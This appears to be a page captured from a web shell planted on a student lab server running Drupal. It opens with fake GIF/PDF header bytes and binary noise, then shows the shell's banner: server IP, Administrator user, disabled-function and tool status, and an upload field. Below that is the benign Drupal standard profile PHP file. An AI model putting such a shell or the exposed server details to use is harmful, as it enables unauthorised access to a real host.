GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /nginx/html/Student/JimMartinson/Lab12/drupal/core/profiles/standard/ |
Upload File : |
<?php /** * @file * Enables modules and site configuration for a standard site installation. */ use Drupal\contact\Entity\ContactForm; use Drupal\Core\Form\FormStateInterface; /** * Implements hook_form_FORM_ID_alter() for install_configure_form(). * * Allows the profile to alter the site configuration form. */ function standard_form_install_configure_form_alter(&$form, FormStateInterface $form_state) { $form['#submit'][] = 'standard_form_install_configure_submit'; } /** * Submission handler to sync the contact.form.feedback recipient. */ function standard_form_install_configure_submit($form, FormStateInterface $form_state) { $site_mail = $form_state->getValue('site_mail'); ContactForm::load('feedback')->setRecipients([$site_mail])->trustData()->save(); }